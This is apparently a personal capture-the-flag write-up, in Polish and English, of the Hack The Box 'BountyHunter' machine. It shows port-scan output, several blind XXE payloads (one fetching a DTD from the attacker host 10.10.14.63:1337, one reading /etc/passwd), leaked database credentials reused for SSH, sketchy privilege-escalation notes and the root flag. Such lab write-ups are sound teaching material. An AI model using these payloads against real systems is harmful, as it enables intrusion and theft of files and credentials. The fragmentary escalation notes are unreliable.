BountyHunter - 30.07.2021

Nmap

┌──(kali㉿kali-os)-[~/htb/bountyhunter/nmap]
└─$ nmap -sC -sV -oA bounty 10.10.11.100 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-29 18:55 EDT
Nmap scan report for 10.10.11.100
Host is up (0.087s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

GoBuster

/index.php            (Status: 200) [Size: 25169]
/.                    (Status: 200) [Size: 25169]
/db.php               (Status: 200) [Size: 0]    
/portal.php           (Status: 200) [Size: 125]

/resources            (Status: 301) [Size: 316] [--> http://10.10.11.100/resources/]
/assets               (Status: 301) [Size: 313] [--> http://10.10.11.100/assets/]   
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.100/css/]      
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.100/js/]

Ciekawy POST

!-- To configure the contact form email address, go to mail/contact_me.php and update the email address in the PHP file on line 19.-->

Tasks:

[ ] Disable 'test' account on portal and switch to hashed password. Disable nopass.
[X] Write tracker submit script
[ ] Connect tracker submit script to the database
[X] Fix developer group permissions

Blind XXE

<?xml  version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [ <!ELEMENT foo ANY >
	<!ENTITY xxe SYSTEM "http://10.10.14.63:1337/test" >]>
<ippsec>&xxe;</ippsec>
<bugreport>
<title>tytul</title>
</bugreport>

Mamy odpowiedź od serwera

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
	<!ENTITY % xxe SYSTEM "http://10.10.14.63:1337/test.xml">%xxe;%param1;]>
<ippsec>&thefile;</ippsec>
 
<bugreport>
<title>tytul</title>
</bugreport>

Natomiast tutaj zadziałał:

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

		<bugreport>
		<title>&xxe;</title>
		<cwe>costam</cwe>
		<cvss>12312</cvss>
		<reward>453234234</reward>
		</bugreport>


<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>

Niestety na w .ssh nie można było odczytać id_rsa

Próba logowania na SSH z hasła powyżej:

ssh development@10.10.11.100			hasło: m19RoAU0hP41A1sTsq6K

Zadziałało :)

Privilege Escalation

sudo python3.8 /opt/skytrain_inc/ticketValidator.py ????

Po małych zmianach skrypt ticketValidator.py zaczał działać

Było zacięcie z importem, wystarczyło dodać dwie podłogi __ przy imporcie

root.txt

d73ac628f0ae8d232bfefb3f0e5dc32e